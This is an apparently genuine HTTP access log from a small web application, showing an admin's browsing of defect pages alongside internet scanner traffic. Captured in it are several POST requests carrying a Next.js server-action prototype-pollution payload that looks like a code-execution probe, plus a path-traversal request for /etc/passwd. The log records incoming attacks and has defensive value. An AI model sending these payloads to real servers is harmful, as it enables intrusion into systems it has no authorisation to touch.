[2026-03-19 16:41:01] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:47008
===================
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-For: 79.139.135.199
Te: trailers
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=4
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-19 16:41:01] === HTTP Request ===
[2026-03-19 16:41:01] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:47008
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Cookie: auth=sess_1773937269413174371; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-19 16:41:01] === HTTP Request ===
[2026-03-19 16:40:45] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:56824
===================
Sec-Fetch-Mode: no-cors
Priority: u=4, i
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Te: trailers
Sec-Fetch-Dest: image
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773937269413174371; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56824
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-19 16:40:45] === HTTP Request ===
[2026-03-19 16:40:45] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:47008
===================
Sec-Fetch-Mode: cors
Cookie: auth=sess_1773937269413174371; user_id=1
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Te: trailers
Priority: u=4
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-19 16:40:45] === HTTP Request ===
[2026-03-19 16:40:45] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:47008
===================
X-Forwarded-Proto: https
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Dest: empty
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-19 16:40:45] === HTTP Request ===
[2026-03-19 16:40:40] Defects page accessed - IP: 172.30.0.12:47008
===================
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Te: trailers
Priority: u=0
Cookie: auth=sess_1773937269413174371; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects
URL: /defects
Method: GET
[2026-03-19 16:40:40] === HTTP Request ===
[2026-03-19 16:40:25] Main page accessed - IP: 172.30.0.12:47008
===================
Priority: u=4
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Accept: */*
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /
URL: /
Method: GET
[2026-03-19 16:40:25] === HTTP Request ===
[2026-03-19 16:40:24] Main page accessed - IP: 172.30.0.12:47008
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: auth=sess_1773937269413174371; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /
URL: /
Method: GET
[2026-03-19 16:40:24] === HTTP Request ===
[2026-03-19 16:39:03] Main page accessed - IP: 139.59.111.55:46046
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.111.55:46046
Path: /
URL: /
Method: GET
[2026-03-19 16:39:03] === HTTP Request ===
===================
------WebKitFormBoundaryx42398890356--
------WebKitFormBoundaryx42398890356
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx42398890356
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 98893+true+428735;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx42398890356
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx42398890356
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 512
X-Nextjs-Html-Request-Id: ilovepoop_42398890356
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:51176
Path: /api/route
URL: /api/route
Method: POST
[2026-03-19 16:36:07] === HTTP Request ===
===================
------WebKitFormBoundaryx1857948986729--
------WebKitFormBoundaryx1857948986729
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1857948986729
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 337598+true+5503436;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1857948986729
X-Nextjs-Html-Request-Id: ilovepoop_1857948986729
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1857948986729
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 522
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:51166
Path: /app
URL: /app
Method: POST
[2026-03-19 16:36:06] === HTTP Request ===
===================
------WebKitFormBoundaryx19930062525--
------WebKitFormBoundaryx19930062525
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx19930062525
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 17684+true+1127011;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx19930062525
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_19930062525
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx19930062525
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:34988
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-19 16:36:05] === HTTP Request ===
===================
------WebKitFormBoundaryx135112318378--
------WebKitFormBoundaryx135112318378
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx135112318378
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 27519+true+4909783;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx135112318378
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_135112318378
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx135112318378
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:34978
Path: /api
URL: /api
Method: POST
[2026-03-19 16:36:03] === HTTP Request ===
===================
------WebKitFormBoundaryx737000527237--
------WebKitFormBoundaryx737000527237
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx737000527237
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 199299+true+3697964;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx737000527237
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx737000527237
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_737000527237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:34974
Path: /_next
URL: /_next
Method: POST
[2026-03-19 16:36:00] === HTTP Request ===
[2026-03-19 16:35:59] Main page accessed - IP: 87.121.84.57:34966
===================
------WebKitFormBoundaryx414829916489--
------WebKitFormBoundaryx414829916489
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx414829916489
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 53287+true+7784824;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx414829916489
X-Nextjs-Html-Request-Id: ilovepoop_414829916489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx414829916489
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 517
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:34966
Path: /
URL: /
Method: POST
[2026-03-19 16:35:59] === HTTP Request ===
[2026-03-19 16:04:05] Main page accessed - IP: 176.65.149.45:44178
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:44178
Path: /
URL: /
Method: GET
[2026-03-19 16:04:05] === HTTP Request ===
[2026-03-19 15:55:48] Login page accessed - IP: 172.30.0.12:33342
===================
Te: trailers
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Dest: document
X-Forwarded-For: 79.139.135.199
Upgrade-Insecure-Requests: 1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33342
Path: /login
URL: /login
Method: GET
[2026-03-19 15:55:48] === HTTP Request ===
[2026-03-19 15:12:24] Main page accessed - IP: 188.166.234.87:49858
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 188.166.234.87:49858
Path: /
URL: /
Method: GET
[2026-03-19 15:12:24] === HTTP Request ===
[2026-03-19 14:51:58] Main page accessed - IP: 207.90.244.22:42660
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:42660
Path: /
URL: /
Method: GET
[2026-03-19 14:51:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:41134
Path: /jars
URL: /jars
Method: GET
[2026-03-19 14:20:53] === HTTP Request ===
[2026-03-19 13:23:26] Main page accessed - IP: 159.223.57.47:46060
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.223.57.47:46060
Path: /
URL: /
Method: GET
[2026-03-19 13:23:26] === HTTP Request ===
[2026-03-19 10:31:08] Main page accessed - IP: 46.161.50.108:56432
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.147 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 46.161.50.108:56432
Path: /
URL: /
Method: GET
[2026-03-19 10:31:08] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 135.237.126.202:57438
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-19 10:26:51] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Forwarded-For: 74.7.244.7
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35358
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-19 07:25:19] === HTTP Request ===
[2026-03-19 06:55:32] Main page accessed - IP: 147.185.132.42:50772
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.42:50772
Path: /
URL: /
Method: GET
[2026-03-19 06:55:32] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:10882
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-19 06:44:17] === HTTP Request ===
[2026-03-19 04:18:11] Main page accessed - IP: 64.23.161.101:37074
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.23.161.101:37074
Path: /
URL: /
Method: GET
[2026-03-19 04:18:11] === HTTP Request ===
[2026-03-19 04:16:21] Main page accessed - IP: 207.90.244.25:37734
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.25:37734
Path: /
URL: /
Method: GET
[2026-03-19 04:16:21] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.16:44570
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-19 01:27:40] === HTTP Request ===
[2026-03-19 01:27:40] Main page accessed - IP: 85.217.140.16:44558
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.16:44558
Path: /
URL: /
Method: GET
[2026-03-19 01:27:40] === HTTP Request ===
[2026-03-19 00:15:48] Main page accessed - IP: 20.64.106.116:36728
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.64.106.116:36728
Path: /
URL: /
Method: GET
[2026-03-19 00:15:48] === HTTP Request ===
[2026-03-19 00:00:55] Main page accessed - IP: 178.128.214.41:58742
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.214.41:58742
Path: /
URL: /
Method: GET
[2026-03-19 00:00:55] === HTTP Request ===
[2026-03-18 22:32:32] Main page accessed - IP: 87.120.191.127:34330
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.120.191.127:34330
Path: /
URL: /
Method: GET
[2026-03-18 22:32:32] === HTTP Request ===
[2026-03-18 21:01:22] Main page accessed - IP: 147.185.132.88:64638
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.88:64638
Path: /
URL: /
Method: GET
[2026-03-18 21:01:22] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56812
Path: /jars
URL: /jars
Method: GET
[2026-03-18 20:50:22] === HTTP Request ===
[2026-03-18 20:23:39] Main page accessed - IP: 159.89.88.188:54698
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.89.88.188:54698
Path: /
URL: /
Method: GET
[2026-03-18 20:23:39] === HTTP Request ===
[2026-03-18 19:57:04] Main page accessed - IP: 176.65.149.45:39368
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:39368
Path: /
URL: /
Method: GET
[2026-03-18 19:57:04] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:49498
Path: /52ls9on_dk7
URL: /52ls9on_dk7
Method: GET
[2026-03-18 19:53:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:49478
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-18 19:53:08] === HTTP Request ===
[2026-03-18 19:53:08] Login page accessed - IP: 66.132.153.123:46562
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:46562
Path: /login
URL: /login
Method: GET
[2026-03-18 19:53:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:46530
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-18 19:53:01] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.123:46516
Path: *
URL: *
Method: PRI
[2026-03-18 19:53:01] === HTTP Request ===
[2026-03-18 19:53:01] Main page accessed - IP: 66.132.153.123:46500
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:46500
Path: /
URL: /
Method: GET
[2026-03-18 19:53:01] === HTTP Request ===
[2026-03-18 18:18:02] Main page accessed - IP: 93.49.0.112:60672
===================
Connection: close
Accept-Encoding: identity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 93.49.0.112:60672
Path: /
URL: /
Method: GET
[2026-03-18 18:18:02] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Pragma: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
X-Forwarded-For: 79.139.135.199
Priority: u=2
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
[2026-03-18 17:42:13] Login page accessed - IP: 172.30.0.12:57492
===================
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Priority: u=0, i
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /login
URL: /login
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
Te: trailers
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Dest: script
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: style
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Priority: u=2
Sec-Fetch-Mode: no-cors
Cache-Control: no-cache
